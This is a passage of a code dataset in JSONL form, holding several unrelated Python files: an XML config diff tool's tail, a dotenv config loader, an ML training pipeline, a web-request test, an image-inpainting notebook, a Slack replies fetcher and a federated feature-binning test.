right_filename.split(os.path.sep) if x not in left_filename.split(os.path.sep)]))),\n os.path.basename(left_filename),\n )\n diff_filename = os.path.join(\n out_dir,\n diff_filename,\n )\n with open(diff_filename, \"wb\") as fp:\n fp.write(\n HTML_TABLE.format(\"\".join(html_rows))\n )\n\n\nif __name__ == \"__main__\":\n cli = Cli(main=main)\n try:\n cli.run()\n except SystemExit:\n pass\n except:\n make_logger(\"error\").exception(\"an unhandled exception occurred.\")\n raise\n", "repo_name": "McIndi/mast.installer", "sub_path": "mast/installer/files/contrib/xcfgdiff.py", "file_name": "xcfgdiff.py", "file_ext": "py", "file_size_in_byte": 8377, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "lxml.etree.parse", "line_number": 36, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 36, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 36, "usage_type": "call"}, {"api_name": "lxml.etree.XSLT", "line_number": 37, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 37, "usage_type": "name"}, {"api_name": "itertools.groupby", "line_number": 42, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 112, "usage_type": "call"}, {"api_name": "lxml.etree.XMLParser", "line_number": 113, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 113, "usage_type": "name"}, {"api_name": "difflib.HtmlDiff", "line_number": 117, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path", "line_number": 122, "usage_type": "attribute"}, {"api_name": "lxml.etree.parse", "line_number": 123, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 123, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 129, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 129, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "os.path.commonprefix", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "mast.hashes.get_sha256", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "itertools.combinations", "line_number": 154, "usage_type": "call"}, {"api_name": "mast.hashes.get_sha256", "line_number": 155, "usage_type": "call"}, {"api_name": "lxml.etree.parse", "line_number": 158, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 158, "usage_type": "name"}, {"api_name": "lxml.etree.parse", "line_number": 160, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 160, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 166, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 166, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 171, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 171, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 182, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 182, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 183, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 183, "usage_type": "name"}, {"api_name": "hashlib.sha256", "line_number": 184, "usage_type": "call"}, {"api_name": "lxml.etree.tostring", "line_number": 201, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 201, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 207, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 207, "usage_type": "name"}, {"api_name": "collections.OrderedDict.fromkeys", "line_number": 215, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 215, "usage_type": "name"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict.fromkeys", "line_number": 216, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 216, "usage_type": "name"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path", "line_number": 217, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 219, "usage_type": "call"}, {"api_name": "os.path", "line_number": 219, "usage_type": "attribute"}, {"api_name": "mast.cli.Cli", "line_number": 230, "usage_type": "call"}, {"api_name": "mast.logging.make_logger", "line_number": 236, "usage_type": "call"}]}
+{"seq_id": "30106085853", "text": "import os\nfrom dotenv import load_dotenv\nimport pathlib\n\n\nclass Configuration:\n SHARED_FILE = \".env.shared\"\n SECRET_FILE = \".env.secret\"\n\n PORT_ENV = \"PORT\"\n LOGS_PATH_ENV = \"LOGS_PATH\"\n AUTH_SECRET_ENV = \"AUTH_SECRET\"\n DOCKER_SOCKET_ENV = \"DOCKER_SOCKET\"\n\n def __init__(self):\n shared_file_full_path = os.path.join(pathlib.Path(__file__).parent.parent.resolve(), Configuration.SHARED_FILE)\n secret_file_full_path = os.path.join(pathlib.Path(__file__).parent.parent.resolve(), Configuration.SECRET_FILE)\n\n if not load_dotenv(shared_file_full_path):\n raise EnvironmentError(\"Missed or empty '%s' file\" % shared_file_full_path)\n if not load_dotenv(secret_file_full_path):\n raise EnvironmentError(\"Missed or empty '%s' file\" % secret_file_full_path)\n\n self.server_port: int = int(os.getenv(Configuration.PORT_ENV, None))\n self.logs_path: str = os.getenv(Configuration.LOGS_PATH_ENV, None)\n self.auth_secret: str = os.getenv(Configuration.AUTH_SECRET_ENV, None)\n self.docker_socket: str = os.getenv(Configuration.DOCKER_SOCKET_ENV, None)\n\n if self.server_port is None:\n raise EnvironmentError(\"Missed '%s' environment variable\" % Configuration.PORT_ENV)\n\n if self.logs_path is None:\n raise EnvironmentError(\"Missed '%s' environment variable\" % Configuration.LOGS_PATH_ENV)\n else:\n # add trailing slash if it's not already set\n self.logs_path = os.path.join(self.logs_path, \"\")\n\n if self.auth_secret is None:\n raise EnvironmentError(\"Missed '%s' environment variable\" % Configuration.AUTH_SECRET_ENV)\n\n if self.docker_socket is None:\n raise EnvironmentError(\"Missed '%s' environment variable\" % Configuration.DOCKER_SOCKET_ENV)\n", "repo_name": "neokaidan/neokaidan-deploy-server", "sub_path": "server/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1823, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 19, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 21, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 24, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 25, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 26, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}]}
+{"seq_id": "19303371335", "text": "import sys,os\nsys.path.append(os.getcwd())\nimport joblib\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\nimport src.features.feature_pipe as features\nimport src.models.ml_models as ml_models\nfrom src.visualization import explainability, model_evaluation\n\ndef train_save_model(df, target, model_name, train_name='', model_type='regression'):\n\n X, y = df.drop(columns=target), df[target]\n\n feature_pipe, feature_grid = features.features_pipeline()\n\n model, ml_grid = ml_models.get_model(model_name)\n\n pipeline = feature_pipe\n pipeline.extend([(\"model\", model)])\n pipe_grid = {}\n pipe_grid.update(feature_grid)\n pipe_grid.update(ml_grid)\n #boruta_selector = BorutaPy(model_, n_estimators='auto', verbose=2, random_state=1)\n pipeline = Pipeline(pipeline)\n cv_result = GridSearchCV(pipeline, feature_grid, cv=5)\n cv_result.fit(X, y)\n\n explainability.feature_importance(model=model_name, cv_result=cv_result,\n train_name=train_name)\n predict = cv_result.predict(X)\n model_evaluation.evaluate_model(model_type=model_type, y_true=y,\n y_pred=predict, train_model=train_name)\n \n model_evaluation.evaluate_kpis(y_true=y, y_pred=predict, model=train_name,\n save=True)\n\n # Save Model\n joblib.dump(cv_result, f'models\\pickle\\model_{train_name}.pickle')", "repo_name": "jubiss/association_rules", "sub_path": "src/models/train_model.py", "file_name": "train_model.py", "file_ext": "py", "file_size_in_byte": 1440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 2, "usage_type": "call"}, {"api_name": "src.features.feature_pipe.features_pipeline", "line_number": 14, "usage_type": "call"}, {"api_name": "src.features.feature_pipe", "line_number": 14, "usage_type": "name"}, {"api_name": "src.models.ml_models.get_model", "line_number": 16, "usage_type": "call"}, {"api_name": "src.models.ml_models", "line_number": 16, "usage_type": "name"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 25, "usage_type": "call"}, {"api_name": "src.visualization.explainability.feature_importance", "line_number": 28, "usage_type": "call"}, {"api_name": "src.visualization.explainability", "line_number": 28, "usage_type": "name"}, {"api_name": "src.visualization.model_evaluation.evaluate_model", "line_number": 31, "usage_type": "call"}, {"api_name": "src.visualization.model_evaluation", "line_number": 31, "usage_type": "name"}, {"api_name": "src.visualization.model_evaluation.evaluate_kpis", "line_number": 34, "usage_type": "call"}, {"api_name": "src.visualization.model_evaluation", "line_number": 34, "usage_type": "name"}, {"api_name": "joblib.dump", "line_number": 38, "usage_type": "call"}]}
+{"seq_id": "11363287683", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n@author: Zhangll\n@software: PyCharm Community Edition\n@time: 2016/9/27 23:04\n\"\"\"\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef test_webpage(url):\n #一般会根据服务器的要求添加识别标记\n headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.113 Safari/537.36'}\n response = requests.get(url,headers=headers)\n soup=BeautifulSoup(response.text,\"lxml\")\n # text=soup.select(\"#article_details > div.article_title > h1 > span > a\")\n\n # print(text)\n print(response.status_code)#403\n print(response.request.headers)#{'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.11.1'} python开头\n print(soup.head.title.text)\n\nif __name__=='__main__':\n # test_webpage(\"http://blog.csdn.net/wswzjdez/article/details/5694942\")\n test_webpage(\"http://www.cec.com.cn\")", "repo_name": "a524631266/crawlday03", "sub_path": "add_headers.py", "file_name": "add_headers.py", "file_ext": "py", "file_size_in_byte": 975, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "75091181288", "text": "# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom PIL import Image\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\n# %%\nim1 = Image.open('/Users/albert/PycharmProjects/test/ImColl/bellucci.jpg')\nim1.save('bel.jpg')\nim = Image.open('bel.jpg')\nim = im.convert('L')\nim.save('belorig.jpg')\npix = np.asarray(im.getdata(), dtype=np.float64).reshape((im.size[1], im.size[0]))\nprint(pix[1][1])\nprint(pix.ndim)\n\n\n# %%\n\n# pix = np.asarray(im.getdata(), dtype=np.float64).reshape((im.size[1], im.size[0]))\n\n\n# %%\nb = 0\nwhile b < 256:\n for a in pix[b]:\n if a > 0:\n a -= 1\n b += 1\n\n\n# %%\ndef distance(x1, y1, z1, x2, y2, z2):\n return ((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)**(1/2)\n\n\n# %%\nAQQURACY = 10000\n\n\n# %%\n#test\ni = 100\n\nwhile i < 200:\n # pix[142][i] = 255\n # pix[143][i] = 255\n # pix[144][i] = 255\n # pix[145][i] = 255\n # pix[146][i] = 255\n # pix[147][i] = 255\n # pix[148][i] = 255\n # pix[149][i] = 255\n pix[132][i] = 255\n pix[133][i] = 255\n pix[134][i] = 255\n pix[135][i] = 255\n pix[136][i] = 255\n pix[137][i] = 255\n pix[138][i] = 255\n pix[139][i] = 255\n # pix[122][i] = 255\n # pix[123][i] = 255\n # pix[124][i] = 255\n # pix[125][i] = 255\n # pix[126][i] = 255\n # pix[127][i] = 255\n # pix[128][i] = 255\n # pix[129][i] = 255\n # pix[112][i] = 255\n # pix[113][i] = 255\n # pix[114][i] = 255\n # pix[115][i] = 255\n # pix[116][i] = 255\n # pix[117][i] = 255\n # pix[118][i] = 255\n # pix[119][i] = 255\n i += 1\n\n\n# %%\nf_y = np.zeros((256, 256))\nf_x = np.zeros((256, 256))\n\n\n# %%\ni = 1\nj = 1\n\n# Differentiation\n\nwhile i < 255:\n while j < 255:\n if pix[i][j] == 255:\n f_x[i][j] = 255\n f_y[i][j] = 255\n j += 1\n continue\n\n if (pix[i][j+1] != 255) and (pix[i][j-1] != 255):\n f_x[i][j] = (pix[i][j+1] - pix[i][j-1])/2\n elif (pix[i][j+1] == 255) and (pix[i][j-1] != 255):\n f_x[i][j] = pix[i][j] - pix[i][j-1]\n elif (pix[i][j+1] != 255) and (pix[i][j-1] == 255):\n f_x[i][j] = pix[i][j+1] - pix[i][j]\n else:\n f_x[i][j] = 255\n\n\n\n if (pix[i+1][j] != 255) and (pix[i-1][j] != 255):\n f_y[i][j] = (pix[i+1][j] - pix[i-1][j])/2\n elif (pix[i+1][j] == 255) and (pix[i-1][j] != 255):\n f_y[i][j] = pix[i][j] - pix[i-1][j]\n elif (pix[i+1][j] != 255) and (pix[i-1][j] == 255):\n f_y[i][j] = pix[i+1][j] - pix[i][j]\n else:\n f_y[i][j] = 255\n\n j += 1\n\n i += 1\n j = 1\n\n\n# %%\ni = 1\nj = 1\np = np.zeros((256, 256))\n\n# \n\nwhile i < 255:\n while j < 255:\n if f_y[i][j] != 0:\n p[i][j] = float('{:.2f}'.format(- math.atan(f_x[i][j]/f_y[i][j])))\n else:\n p[i][j] = - math.pi/2 #Тут мы доопределяем неопределенность типа 0/0 значением, равным pi/2 (нуждает в уточнении)\n\n if f_y[i][j] == 255:\n p[i][j] = 255\n\n\n\n j += 1\n i += 1\n j = 1\n\n \n\n\n\n\n\n\nnx, ny = 256, 256 \nx = range(nx) \ny = range(ny) \n\nhf = plt.figure() \nha = hf.add_subplot(111, projection='3d') \nX, Y = np.meshgrid(x, y) # `plot_surface` expects `x` and `y` data to be 2D \nha.plot_surface(X, Y, p) \n\n\n# %%\nNewPix = np.zeros((256, 256, 100001))\nccc = 0\ni = 2\nj = 2\n\nwhile i < 255:\n while j < 255:\n if(p[i][j] < 200):\n NewPix[i][j][int((AQQURACY * p[i][j]) + 5*AQQURACY)]\n # while k < 5*AQQURACY:\n # if k == (AQQURACY * p[i][j]):\n \n # NewPix[i][j][k+5*AQQURACY] = pix[i][j] \n \n\n # else:\n # NewPix[i][j][k+5*AQQURACY] = 256\n \n \n # k += 1\n\n j += 1\n # k = -5*AQQURACY\n \n i += 1\n j = 1\n\n\n\n\n\n\n# %%\nMainSq = np.zeros((4,2), dtype=int)\n\nMainSq[0] = [1, 4]\nprint(NewPix[252][105])\n\n\n# %%\n\n# Поиск столбцов\n\ni = 1\nj = 1\ndamaged_pix = 0\n\nwhile i < 255:\n while j < 255:\n if pix[i][j] == 255.0:\n damaged_pix += 1\n j += 1\n i += 1\n j = 1\n\ni = 1\nj = 1\nk = -50\nx = 1\n\npixcopy = pix.copy()\n\nwhile damaged_pix > 0:\n\n while i < 255:\n while j < 255:\n if pix[i][j] == 255.0: # если нашел поврежденный пиксель\n \n while i + x < 256: # поиск вниз\n if pix[i + x][j] == 255.0:\n x += 1\n else:\n break\n\n if i + x >= 256:\n x -= 1\n\n MainSq[0] = [i + x, j] \n x = 1\n\n\n\n\n while i - x >= 0: # поиск вверх\n if pix[i - x][j] == 255.0:\n x += 1\n else:\n break\n\n if i - x < 0:\n x -= 1\n\n MainSq[1] = [i - x, j]\n x = 1\n\n while j + x < 256: # поиск вправо\n if pix[i][j + x] == 255.0:\n x += 1\n else:\n break\n\n if j + x >= 256:\n x -= 1\n\n MainSq[2] = [i, j + x]\n x = 1\n\n while j - x >= 0: # поиск влево\n if pix[i][j - x] == 255.0:\n x += 1\n else:\n break\n\n if j - x < 0:\n x -= 1\n\n MainSq[3] = [i, j - x]\n\n x = 1\n\n \n\n a = min(p[MainSq[0][0]][MainSq[0][1]], p[MainSq[1][0]][MainSq[1][1]], p[MainSq[2][0]][MainSq[2][1]], p[MainSq[3][0]][MainSq[3][1]])\n b = max(p[MainSq[0][0]][MainSq[0][1]], p[MainSq[1][0]][MainSq[1][1]], p[MainSq[2][0]][MainSq[2][1]], p[MainSq[3][0]][MainSq[3][1]])\n k = a * AQQURACY\n k = int(k)\n while k <= b:\n dist0 = distance(i, j, k + 5*AQQURACY, MainSq[0][0], MainSq[0][1], (int(p[MainSq[0][0]][MainSq[0][1]] * AQQURACY)))\n dist1 = distance(i, j, k + 5*AQQURACY, MainSq[1][0], MainSq[1][1], (int(p[MainSq[1][0]][MainSq[1][1]] * AQQURACY)))\n dist2 = distance(i, j, k + 5*AQQURACY, MainSq[2][0], MainSq[2][1], (int(p[MainSq[2][0]][MainSq[2][1]] * AQQURACY)))\n dist3 = distance(i, j, k + 5*AQQURACY, MainSq[3][0], MainSq[3][1], (int(p[MainSq[3][0]][MainSq[3][1]] * AQQURACY)))\n\n\n NewPix[i][j][k + 5*AQQURACY] = pix[MainSq[0][0]][MainSq[0][1]] * (dist1 + dist2 + dist3) + pix[MainSq[1][0]][MainSq[1][1]] * (dist0 + dist2 + dist3) + pix[MainSq[2][0]][MainSq[2][1]] * (dist1 + dist0 + dist3) + pix[MainSq[3][0]][MainSq[3][1]] * (dist1 + dist2 + dist0)\n\n NewPix[i][j][k + 5*AQQURACY] = NewPix[i][j][k + 5*AQQURACY] / (3 * (dist0 + dist1 + dist2 + dist3))\n \n\n k += 1\n### ТУТ НУЖНО НЕ ЗАБЫТЬ ОБНУЛИТЬ K ДА И ВООБЩЕ КРЕПКО ПОДУМАТЬ О ЖИЗНИ\n damaged_pix -= 1\n pixcopy[i][j] = 255.0\n for it in NewPix[i][j]:\n if ((it < pixcopy[i][j]) and (it > 0)):\n pixcopy[i][j] = it\n\n\n \n j += 1\n i += 1\n j = 1\n pix = pixcopy.copy()\n i = 1\n\n\n\n\n\n\n\n # sum = (left * rstep + right * lstep)/(lstep + rstep) + (up * dstep + down * ustep)/(dstep + ustep)\n\n\n # Radius = 8\n\n\n # if ustep * dstep != 0:\n # if ustep + dstep < 2*Radius:\n # sum1 = ((up * dstep) + (down * ustep)) / (dstep + ustep)\n # sum = sum1\n # else:\n # sum1 = 0\n # else:\n # sum1 = 0\n\n\n # if lstep * rstep != 0:\n # if lstep + rstep < 2*Radius:\n # sum2 = ((left * rstep) + (right * lstep)) / (lstep + rstep)\n # if (lstep + rstep) < (ustep + dstep):\n # sum = sum2\n # else: sum2 = 0\n # else:\n # sum2 = 0\n\n\n\n\n # if (sum1 == 0) | (sum2 == 0):\n # k = 1\n # else:\n # k = 2\n #\n # pixcopy[i][j] = (sum1+sum2)/k #тут основная проблема. Суммы нужно выбирать тоже с разными коэффициентами\n\n\n\n # if sum != 0:\n # pixcopy[i][j] = sum\n # damaged_pix -= 1\n # sum1 = 0\n # sum2 = 0\n # sum = 0\n # down = 0\n # up = 0\n # left = 0\n # right = 0\n \n\n\n# %%\nprint(NewPix[132][130])\n\n\n# %%\nprint(pix[132][130])\n\n\n# %%\npix = np.asarray(pix, dtype=np.uint8)\n\nImRes = Image.fromarray(pix, mode='L')\n\nImRes.save('resbel.jpg')\n\n\n# %%\n\n\n\n", "repo_name": "Deewer25/Image_Reconstration", "sub_path": "lift and recover/lift1.py", "file_name": "lift1.py", "file_ext": "py", "file_size_in_byte": 9286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.Image.open", "line_number": 12, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 12, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 14, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 14, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 133, "usage_type": "call"}, {"api_name": "math.atan", "line_number": 140, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 142, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 390, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 392, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 392, "usage_type": "name"}]}
+{"seq_id": "1241587024", "text": "from datasetcreation.config.configuration import ConfigManager\nimport requests\nfrom ensure import ensure_annotations\nfrom datasetcreation.utils.common import get_slack_auth_token\nfrom datasetcreation.pipeline.conversations_stage import ConversationsStage\nfrom datasetcreation import logger\nimport time\n\nSTAGE_NAME = \"Fetch replies\"\n\nclass RepliesStage:\n def __init__(self, config_manager: ConfigManager) -> None:\n self.config_manager = config_manager\n\n @ensure_annotations\n def main(self, conversations_generator):\n auth_token = get_slack_auth_token()\n for channel_id, ts in conversations_generator():\n url = self.config_manager.config.slack.replies_url.replace('{channel_id}', channel_id).replace('{ts}', ts)\n headers = {'Authorization': f'Bearer {auth_token}'}\n try:\n response = requests.get(url, headers=headers)\n yield channel_id, ts, response.json()\n except Exception as e:\n logger.error(f'Error calling {url}, {e}')\n time.sleep(1)\n\nif __name__ == '__main__':\n config_manager = ConfigManager()\n conv_stage = ConversationsStage(config_manager)\n stage = RepliesStage(config_manager)\n for channel, ts, response in stage.main(conv_stage.main):\n logger.info(f'Channel and ts: {channel}, {ts} returns response {response}')", "repo_name": "dimoynwa/sp2t-text-summarizer", "sub_path": "src/datasetcreation/pipeline/replies_stage.py", "file_name": "replies_stage.py", "file_ext": "py", "file_size_in_byte": 1370, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datasetcreation.config.configuration.ConfigManager", "line_number": 12, "usage_type": "name"}, {"api_name": "datasetcreation.utils.common.get_slack_auth_token", "line_number": 17, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "datasetcreation.logger.error", "line_number": 25, "usage_type": "call"}, {"api_name": "datasetcreation.logger", "line_number": 25, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "ensure.ensure_annotations", "line_number": 15, "usage_type": "name"}, {"api_name": "datasetcreation.config.configuration.ConfigManager", "line_number": 29, "usage_type": "call"}, {"api_name": "datasetcreation.pipeline.conversations_stage.ConversationsStage", "line_number": 30, "usage_type": "call"}, {"api_name": "datasetcreation.logger.info", "line_number": 33, "usage_type": "call"}, {"api_name": "datasetcreation.logger", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "26900030865", "text": "import argparse\n\nimport numpy as np\n\nfrom fate_arch.session import computing_session as session\nfrom fate_arch.computing import ComputingType\nfrom fate_arch.session import Session\nfrom federatedml.feature.homo_feature_binning import homo_split_points\nfrom federatedml.feature.instance import Instance\nfrom federatedml.feature.sparse_vector import SparseVector\nfrom federatedml.util import consts\n\nGUEST = 'guest'\nHOST = 'host'\nARBITER = 'arbiter'\nhost_id_list = ['10000', '10001', '10002']\n\n\nclass TestHomoFeatureBinning():\n def __init__(self, role, own_id):\n self.role = role\n self.party_id = own_id\n self.model_name = 'HomoFeatureBinning'\n self.args = None\n self.table_list = []\n\n def _gen_data(self, data_num, feature_num, partition,\n expect_split_points, is_sparse=False, use_random=False):\n data = []\n shift_iter = 0\n header = [str(i) for i in range(feature_num)]\n bin_num = len(expect_split_points)\n\n for data_key in range(data_num):\n value = expect_split_points[data_key % bin_num]\n if value == expect_split_points[-1]:\n if shift_iter % bin_num == 0:\n value = expect_split_points[0]\n shift_iter += 1\n if not is_sparse:\n if not use_random:\n features = value * np.ones(feature_num)\n else:\n features = np.random.random(feature_num)\n inst = Instance(inst_id=data_key, features=features, label=data_key % 2)\n\n else:\n if not use_random:\n features = value * np.ones(feature_num)\n else:\n features = np.random.random(feature_num)\n data_index = [x for x in range(feature_num)]\n sparse_inst = SparseVector(data_index, data=features, shape=feature_num)\n inst = Instance(inst_id=data_key, features=sparse_inst, label=data_key % 2)\n header = [str(i) for i in range(feature_num)]\n\n data.append((data_key, inst))\n result = session.parallelize(data, include_key=True, partition=partition)\n result.schema = {'header': header}\n self.table_list.append(result)\n return result\n\n def test_homo_split_points(self, is_sparse=False):\n # binning_obj = HomoSplitPointCalculator(role=self.role)\n if self.role == consts.ARBITER:\n binning_obj = homo_split_points.HomoFeatureBinningServer()\n else:\n binning_obj = homo_split_points.HomoFeatureBinningClient()\n\n guest_split_points = (1, 2, 3)\n host_split_points = [(4, 5, 6), (7, 8, 9), (10, 11, 12)]\n expect_agg_sp = [guest_split_points]\n expect_agg_sp.extend(host_split_points)\n expect_agg_sp = np.mean(expect_agg_sp, axis=0)\n if self.role == GUEST:\n data_inst = self._gen_data(1000, 10, 48, expect_split_points=guest_split_points, is_sparse=is_sparse)\n elif self.role == ARBITER:\n data_inst = None\n else:\n host_idx = host_id_list.index(self.party_id)\n data_inst = self._gen_data(1000, 10, 48,\n expect_split_points=host_split_points[host_idx], is_sparse=is_sparse)\n agg_sp = binning_obj.average_run(data_inst, bin_num=3)\n for col_name, col_agg_sp in agg_sp.items():\n # assert np.all(col_agg_sp == expect_agg_sp)\n assert np.linalg.norm(np.array(col_agg_sp) - np.array(expect_agg_sp)) < consts.FLOAT_ZERO\n print(\"is_sparse: {}, split_point detected success\".format(is_sparse))\n\n transferred_table, split_points_result, bin_sparse = binning_obj.convert_feature_to_bin(data_inst, agg_sp)\n if self.role == ARBITER:\n assert transferred_table == split_points_result == bin_sparse is None\n else:\n transferred_data = list(transferred_table.collect())[:10]\n print(\"transferred_data: {}, split_points_result: {}, bin_sparse: {}\".format(\n [x[1].features for x in transferred_data], split_points_result, bin_sparse\n ))\n\n return\n\n def test_query_quantiles(self, is_sparse=False):\n if self.role == consts.ARBITER:\n binning_obj = homo_split_points.HomoFeatureBinningServer()\n else:\n binning_obj = homo_split_points.HomoFeatureBinningClient()\n\n guest_split_points = (1, 2, 3)\n host_split_points = [(4, 5, 6), (7, 8, 9), (10, 11, 12)]\n\n if self.role == GUEST:\n data_inst = self._gen_data(1000, 10, 16, expect_split_points=guest_split_points,\n is_sparse=is_sparse, use_random=True)\n elif self.role == ARBITER:\n data_inst = None\n else:\n host_idx = host_id_list.index(self.party_id)\n data_inst = self._gen_data(1000, 10, 16,\n expect_split_points=host_split_points[host_idx],\n is_sparse=is_sparse,\n use_random=True)\n query_points = binning_obj.query_quantile_points(data_inst, 0.2)\n print(query_points)\n\n def tearDown(self):\n for table in self.table_list:\n table.destroy()\n print(\"Finish testing\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-r', '--role', required=False, type=str, help=\"role\",\n choices=(GUEST, HOST, ARBITER), default=GUEST)\n parser.add_argument('-pid', '--pid', required=True, type=str, help=\"own party id\")\n parser.add_argument('-j', '--job_id', required=True, type=str, help=\"job_id\")\n\n args = parser.parse_args()\n job_id = args.job_id\n own_party_id = args.pid\n role = args.role\n print(\"args: {}\".format(args))\n\n with Session() as session:\n session.init_computing(job_id, computing_type=ComputingType.STANDALONE)\n session.init_federation(job_id,\n runtime_conf={\"local\": {\n \"role\": role,\n \"party_id\": own_party_id\n },\n \"role\": {\n \"host\": [str(x) for x in host_id_list],\n \"guest\": [\n '9999'\n ],\n \"arbiter\": ['9998']\n }\n })\n\n test_obj = TestHomoFeatureBinning(role, own_party_id)\n # homo_obj.test_homo_lr()\n test_obj.test_query_quantiles()\n # 